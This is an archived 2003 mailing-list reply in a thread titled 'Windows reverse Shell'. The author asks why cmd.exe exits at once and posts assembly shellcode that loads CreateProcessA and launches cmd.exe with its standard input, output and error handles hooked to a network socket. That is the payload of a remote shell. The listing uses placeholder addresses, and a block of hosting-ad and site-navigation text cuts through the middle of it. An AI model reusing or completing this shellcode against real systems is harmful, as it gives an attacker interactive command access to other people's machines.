Hosting Provided By

Re: Windows reverse Shell

From: Berend-Jan Wever <skylined(at)edup.tudelft.nl>
Date: Tue Feb 04 2003 - 19:54:44 EST

('binary' encoding is not supported, stored as-is)
In-Reply-To: <00ef01c2cc6c$7fb7a030$a7db5cdb@sk4n>

I wrote a little piece of shellcode that should spawn a shell using a socket in %ebp, which will execute cmd.exe succesfully. The problem is that cmd.exe dies right away. Has anybody got an idear why ? The source (asm for linux) is included.

Kind regards,

Berend-Jan Wever

Start:
MakeStringAndNegEbx:

      mov     $',', %al
      xor     %ecx, %ecx
      dec     %ecx
      repne   scasb             # search for ','
      sub     %al, -1(%edi)
      neg     %ebx
      ret
    
    GetLibraryAndProcAddress: # {
      push    %edi              # > libName
      mov     $-0xXXXXXX, %ebx  #
      call    MakeStringAndNegEbx # put 0 after libName
      call    *(%ebx)           # < LoadLibraryA(libName);

      push    %edi              # > procName
      push    %eax              #  > libHandle
      mov     $-0xXXXXXX, %ebx  #
      call    MakeStringAndNegEbx # put 0 after ProcName
      call    *(%ebx)           # << GetProcAddress(libHandle, procName);
      ret

# }

main1:
# %ebp = socket

      pop     %edi              # < %edi = &strings
      


      # create a struct StartupInfo on the stack.


      xor     %eax, %eax
      push    %ebp              # HANDLE hStdError = socket
      push    %ebp              # HANDLE hStdOutput = socket
      push    %ebp              # HANDLE hStdInPut = socket
      push    %eax              # LPBYTE lpReserved2 = NULL
      inc     %eax              # WORD   cbReserved2 = 0;
      push    %eax              # WORD   wShowWindow = 1;
      mov     %al, %ah          # 0x101
      push    %eax              # DWORD  dwFlags = STARTF_USESHOWWINDOW |
      xor     %eax, %eax        #                  STARTF_USESTDHANDLES
      push    %eax              # DWORD  dwFillAttribute = 0
      push    %eax              # DWORD  dwYCountChars = 0
      push    %eax              # DWORD  dwXCountChars = 0
      push    %eax              # DWORD  dwYSize = 0
      push    %eax              # DWORD  dwXSize = 0
      push    %eax              # DWORD  dwY = 0
      push    %eax              # DWORD  dwX = 0
      push    %eax              # LPTSTR lpTitle = NULL (program name)
Do you need help? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
      push    %eax              # LPTSTR lpDesktop = NULL (inherit)
      push    %eax              # LPTSTR lpReserved = NULL
      mov     $0x44, %al
      push    %eax              # DWORD  cb = 0x44 (length);
      mov     %esp, %esi


      # create a struct ProcessInformation on the stack.


      xor     %eax, %eax
      push    %eax              # HANDLE hProcess;
      push    %eax              # HANDLE hThread;
      push    %eax              # DWORD dwProcessId;
      push    %eax              # DWORD dwThreadId;


      # create a process with STD I/O handles hooked to socket.


      push    %esp              # > lpProcessInformation -> stack
      push    %esi              #  > lpStartupInfo -> stack
      push    %eax              #   > lpCurrentDirecty: NULL 
      push    %eax              #    > lpEnvironment: NULL
      push    %eax              #     > dwCreationFlags: 0
      inc     %eax
      push    %eax              #      > bInheritHandles: 1 (true)
      dec     %eax
      push    %eax              #       > lpThreadAttributes: NULL
      push    %eax              #        > lpProcessAttributes: NULL
      push    %edi              #         > lpCommandLine: &('cmd.exe')
      push    %eax              #          > lpApplicationName: NULL
      call    MakeStringAndNegEbx # put 0 after commandline
      call    GetLibraryAndProcAddress # LoadLibrary and GetProcAddress
      call    *%eax             # <<<<<<<<<< CreateProcess(...);
      
    InfinitLoop:
      jmp     InfinitLoop       # wait forever.

    EntryPoint:
      lea   0xXX(%esp), %eax    # socket is on the stack at XX
      mov   (%eax), %ebp        # socket
      call  main1

End:

The code is followed by this string:

"cmd.exe,kernel32.dll,CreateProcessA," Received on Wed Feb 5 12:07:40 2003

This message: [ Message body ]
Next message: Ali Saifullah Khan: "Re: Windows reverse Shell"
Previous message: sk: "Re: Windows reverse Shell"
In reply to: sk: "Re: Windows reverse Shell"
Next in thread: Ali Saifullah Khan: "Re: Windows reverse Shell"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:37 EDT

Do you need more help?